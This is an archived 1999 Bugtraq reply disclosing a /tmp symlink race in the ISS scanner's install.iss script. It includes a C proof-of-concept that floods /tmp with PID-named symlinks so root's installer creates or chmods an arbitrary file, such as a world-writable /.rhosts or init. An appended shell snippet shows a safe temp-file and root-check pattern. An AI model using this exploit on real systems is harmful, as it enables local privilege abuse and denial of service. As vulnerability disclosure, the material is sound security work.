[9733] in bugtraq


Re: ISS install.iss security hole

daemon@ATHENA.MIT.EDU (Joel Eriksson)
Mon Feb 22 15:49:47 1999

Date: 	Mon, 22 Feb 1999 13:35:21 +0100
Reply-To: Joel Eriksson <na98jen@STUDENT.HIG.SE>
From: Joel Eriksson <na98jen@STUDENT.HIG.SE>
X-To:         Fyodor <fyodor@DHP.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <Pine.LNX.4.04.9902202023190.5697-100000@shell.dhp.com>

On Sat, 20 Feb 1999, Fyodor wrote:

> Today I downloaded the latest trial version of Internet Security Scanner
> for Linux (version 5.3).
>
> The install program (shell script) requires that you be root, even if you
> want to install ISS in your home directory.  I decided to edit the script
> to comment out the root-check, and was rather shocked when I saw what they
> are doing in install.iss:
>
>   # Only root can pass the next four operations.
>   # Yes it's ugly - BUT IT WORKS!
>   touch /tmp/.root.$$ >> /dev/null 2>&1
>   chmod 600 /tmp/.root.$$ >> /dev/null 2>&1
>
> Obviously this is vulnerable to the standard tmp-symlink problem.  And
> they don't even look for the file first, so there is no need to worry
> about exploiting race conditions -- just stick the 65K symlinks in /tmp
> and wait for root to install ISS (you might have to wait a while ;). I've
> tested that you can chmod whatever file you want to 600.  This could make
> for an easy DOS, but off the top of my head I don't see much more exploit
> potential.

One other issue that I see with this is:

--- start of stupid 3xPl0i+ example
#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

#define MINPID	1
#define MAXPID  65535

int main(int argc, char **argv)
{
        /* "/tmp/.root." (11 chars) + up to five digits + NUL.
         * Assumes MAXPID = 65535, or at least a five digit number. */
        char filename[16+1];
        struct stat buf;
        int i;

        if(argc != 2) {
                fprintf(stderr, "Usage: %s <file-to-create>\n", argv[0]);
                exit(1);
        }

        memset(filename, 0, sizeof(filename));

        /* One symlink per possible $$ value, all pointing at the target. */
        for(i=MINPID; i<=MAXPID; i++) {
                snprintf(filename, sizeof(filename), "/tmp/.root.%d", i);
                symlink(argv[1], filename);
        }

        memset(filename, 0, sizeof(filename));

        /* Busy-wait until the target exists, i.e. until install.iss has
         * done its "touch" through one of the links. */
        while(stat(argv[1], &buf) == -1);

        /* Remove the links again before the following chmod 600 runs. */
        for(i=MINPID; i<=MAXPID; i++) {
                snprintf(filename, sizeof(filename), "/tmp/.root.%d", i);
                unlink(filename);
        }

        printf("%s was created. Filemode = 0%o\n", argv[1], buf.st_mode & 0666);

        if(! access(argv[1], W_OK))
                printf("I suppose you got lucky... (Or ran this as root.)\n");
        else
                printf("Sorry, no write permissions for you...\n");

        exit(0);
}
---  end of stupid 3xPl0i+ example

For those who can't code, or do not see my point: if root has a
stupid umask this vulnerability may be exploited to create, for example,
a world-writeable /.rhosts (I suppose the ISS script does not change
umask to 077, since they do a chmod on the file).

No matter what the umask is, it could easily be made to perform a DoS attack;
what about changing the permissions on, for example, `which init` to 600...
Anyone with a little imagination could think of other possibilities.

> While this is probably not going to be exploited much (if ever), it really
> concerns me that kindergarten-level security holes are still present in
> current mass market **security** software.  Remember that ISS chooses not
> to offer us (or even paying customers!) the source code for their scanner.
> So we have to trust ISS programmers are highly competent and aware of
> secure coding issues.  When I find problems like the one above without
> even looking for them, I have to wonder whether this trust is misplaced.

That is the BIG issue here. My exploit example is a possible attack, but
there is still a rather small chance of it being successfully used for
something other than a DoS attack, since we have to unlink the symlink
before the chmod occurs, and since root must have a stupid umask...

What really does disturb me, just as Fyodor, is that this really basic
kind of security hole exists in a commercial security scanner that is
supposed to find other security flaws on its customers' systems. If I were an
ISS customer I would start to worry just about now...

> Cheers,
> Fyodor
>
> PS (shameless plug):  Version 2.08 of the nmap security scanner is
> available free, with source code, at http://www.insecure.org/nmap/

It's a great tool! :-)

/ Joel Eriksson - Systems / Security administrator, Network engineer, Programmer, UNIX Guru

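As an added example that is not part of the original thread or of the ISS install script: the two things install.iss gets wrong (deciding "am I root?" by touching a predictable name in /tmp, and letting the caller's umask decide the mode of that file before the chmod) can be done safely in a few lines of POSIX sh. The function names `is_root`, `make_private_tmpfile` and `mode_of` are my own.

```shell
#!/bin/sh
# Added example, not code from the thread or from ISS.
#
# Pattern quoted in the thread (shown for contrast, never executed here):
#   touch /tmp/.root.$$ >> /dev/null 2>&1
#   chmod 600 /tmp/.root.$$ >> /dev/null 2>&1
# A predictable name in a world-writable directory lets any local user
# pre-place a symlink; touch then creates the link target with root's
# umask, and chmod acts on the target, not on the link.

# Answer "am I root?" from the effective uid, with no side effect in /tmp.
is_root() {
    [ "$(id -u)" -eq 0 ]
}

# Create a scratch file only we can read, inside a private directory.
# The body runs in a subshell so umask and noclobber do not leak out.
make_private_tmpfile() (
    # Close the window before the file exists: 0666 & ~077 = 0600,
    # whatever umask the person running the installer happens to have.
    umask 077
    # mktemp -d gives an unpredictable directory owned by us (mode 0700),
    # so nothing can be pre-created inside it.
    dir=$(mktemp -d "${TMPDIR:-/tmp}/install.XXXXXX") || exit 1
    file="$dir/scratch"
    # noclobber: '>' fails if the path already exists, link or file.
    set -C
    : > "$file" || { rm -rf "$dir"; exit 1; }
    # Refuse anything that is not a plain file we just created.
    if [ -L "$file" ] || [ ! -f "$file" ]; then
        rm -rf "$dir"
        exit 1
    fi
    printf '%s\n' "$file"
)

# Portable (GNU/BSD) check of the exact mode bits of a path:
# find prints the path only when -perm matches exactly.
mode_of() {
    if [ -n "$(find "$1" -prune -perm 600)" ]; then
        echo 600
    else
        echo other
    fi
}
```

Run it as an ordinary user: `is_root` fails, and the file returned by `make_private_tmpfile` is a regular file with mode 600 regardless of the shell's umask.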
